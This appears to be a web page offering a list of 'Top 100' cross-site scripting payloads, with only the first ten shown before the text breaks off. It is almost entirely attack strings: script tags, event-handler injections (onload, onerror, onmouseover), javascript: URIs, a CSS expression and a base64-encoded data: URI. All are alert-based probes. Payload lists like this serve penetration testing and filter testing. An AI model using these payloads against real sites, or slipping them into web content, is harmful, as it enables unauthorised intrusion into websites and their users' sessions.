Top 100 Cross Site Scripting(XSS) Payloads

1. <script>alert('XSS')</script> 2. <img src="javascript:alert('XSS');"> 3. <svg/onload=alert('XSS')> 4. <body onload=alert('XSS')> 5. <img src=x onerror=alert('XSS')> 6. <input type="text" value="``onmouseover=alert('XSS')"> 7. <a onmouseover="alert('XSS')">link</a> 8. <div style="xg-p:expression(alert('XSS'))"> 9. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="> 10. <iframe src="javascript:alert('XSS');">…

0 Comments